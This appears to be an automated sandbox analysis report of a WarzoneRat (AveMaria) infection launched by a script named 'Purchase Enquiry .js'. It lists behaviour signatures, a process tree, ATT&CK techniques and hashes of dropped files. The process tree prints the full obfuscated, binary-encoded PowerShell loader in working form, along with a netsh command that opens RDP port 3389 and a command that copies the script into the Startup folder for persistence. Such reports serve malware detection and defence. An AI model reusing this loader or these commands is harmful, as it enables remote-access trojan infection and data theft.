Overview

overview

10

Static

static

Purchase Enquiry .js

windows7-x64

3

Purchase Enquiry .js

windows10-2004-x64

10

Analysis

  • max time kernel
    167s
  • max time network
    191s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-11-2022 04:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Purchase Enquiry .js

  • Size

    1KB

  • MD5

    840422981206fe204ad674b563497eee

  • SHA1

    fbadcc5fa1e489d965591d769da3bf7039fc5b7f

  • SHA256

    76522e1121f296222f3a9c9913638e5e6e9ab4be9206fc86ed32c1827b44b689

  • SHA512

    8cc95a62d66b7afcb8f402b4603773a3d3b877cdbf0c07492f75cc3b5bfc6e5cb91aa0997509b0e939a187ad8037d766ba23a4c3758da94a31940a4fc348d9ee

Score
10/10
warzoneratevasioninfostealerpersistenceratupx

Malware Config

Signatures

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Warzone RAT payload 5 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
    persistence
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 28 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Purchase Enquiry .js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51151555,51115551,51151115,51115111,51151555,51155551,55151115,51111555,51111551,51111515,55151111,51115511,51155551,55151111,51115511,51155551,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2472
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
          PID:1560
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
          3⤵
            PID:2380
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            3⤵
            • Sets DLL path for service in the registry
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Users\Admin\AppData\Local\Temp\9.exe
              "C:\Users\Admin\AppData\Local\Temp\9.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2068
              • C:\Windows\SysWOW64\netsh.exe
                netsh advfirewall firewall add rule name="3389" dir=in action=allow protocol=TCP localport=3389
                5⤵
                • Modifies Windows Firewall
                PID:3820
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 396
                5⤵
                • Program crash
                PID:1012
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\Purchase Enquiry .js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: RenamesItself
          • Suspicious use of AdjustPrivilegeToken
          PID:3136
      • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
        "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
        1⤵
          PID:1980
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3272
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3272 CREDAT:17410 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1180
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k NetworkService -s TermService
          1⤵
            PID:4556
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2068 -ip 2068
            1⤵
              PID:4032

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Persistence

            Modify Existing Service

            1
            T1031

            Registry Run Keys / Startup Folder

            1
            T1060

            Privilege Escalation

            Defense Evasion

            Modify Registry

            2
            T1112

            Credential Access

            Discovery

            Query Registry

            1
            T1012

            System Information Discovery

            2
            T1082

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              6cf293cb4d80be23433eecf74ddb5503

              SHA1

              24fe4752df102c2ef492954d6b046cb5512ad408

              SHA256

              b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

              SHA512

              0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              1KB

              MD5

              454f9e7fa8aad19d6bac74d19b3086b2

              SHA1

              fd31e6cf15a019921faf239343ace0da3cfb06c2

              SHA256

              0f3226ebe6776806997c74f28e76ad5eb235909b8645d43d3564d823fc7834f2

              SHA512

              763af517762363994c0da1bbeef555ce4d8e7928b8dc9ece3aa90a24a232490f990c1948687957c55df2b010cc95c08267e4c5df48645739c70416c60a54840e

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll
              Filesize

              75KB

              MD5

              42b2c266e49a3acd346b91e3b0e638c0

              SHA1

              2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

              SHA256

              adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

              SHA512

              770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\784b3b15-2b8e-42df-b11e-ec70bb6ec5f0\AgileDotNetRT64.dll
              Filesize

              75KB

              MD5

              42b2c266e49a3acd346b91e3b0e638c0

              SHA1

              2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

              SHA256

              adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

              SHA512

              770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\9.exe
              Filesize

              70KB

              MD5

              ca96229390a0e6a53e8f2125f2c01114

              SHA1

              a54b1081cf58724f8cb292b4d165dfee2fb1c9f6

              SHA256

              0df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c

              SHA512

              e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\9.exe
              Filesize

              70KB

              MD5

              ca96229390a0e6a53e8f2125f2c01114

              SHA1

              a54b1081cf58724f8cb292b4d165dfee2fb1c9f6

              SHA256

              0df3d05900e7b530f6c2a281d43c47839f2cf2a5d386553c8dc46e463a635a2c

              SHA512

              e93445bce6c8b6f51890309577a0ea9369860d2e6bf8cc0ca708879a77bb176d27c5f559bbdb7deb4b719aee0fc48d9068c293559f7629baf4ec3515898102ef

              Download Submit
            • memory/2068-151-0x0000000000000000-mapping.dmp
              Download
            • memory/2068-155-0x0000000000200000-0x000000000022D000-memory.dmp
              Filesize

              180KB

              Download
            • memory/2312-150-0x000000000B470000-0x000000000B610000-memory.dmp
              Filesize

              1.6MB

              Download
            • memory/2312-149-0x0000000000400000-0x0000000000568000-memory.dmp
              Filesize

              1.4MB

              Download
            • memory/2312-147-0x0000000000400000-0x0000000000568000-memory.dmp
              Filesize

              1.4MB

              Download
            • memory/2312-141-0x0000000000400000-0x0000000000568000-memory.dmp
              Filesize

              1.4MB

              Download
            • memory/2312-142-0x000000000040B556-mapping.dmp
              Download
            • memory/2312-146-0x0000000000400000-0x0000000000568000-memory.dmp
              Filesize

              1.4MB

              Download
            • memory/2472-137-0x00007FF9D2C60000-0x00007FF9D3721000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/2472-148-0x00007FF9D2C60000-0x00007FF9D3721000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/2472-139-0x00007FF9CBA60000-0x00007FF9CBBAE000-memory.dmp
              Filesize

              1.3MB

              Download
            • memory/2472-132-0x0000000000000000-mapping.dmp
              Download
            • memory/2472-135-0x00007FF9D2C60000-0x00007FF9D3721000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/2472-133-0x0000019CCAC60000-0x0000019CCAC82000-memory.dmp
              Filesize

              136KB

              Download
            • memory/3136-136-0x00007FF9D2C60000-0x00007FF9D3721000-memory.dmp
              Filesize

              10.8MB

              Download
            • memory/3136-134-0x0000000000000000-mapping.dmp
              Download
            • memory/3820-154-0x0000000000000000-mapping.dmp
              Download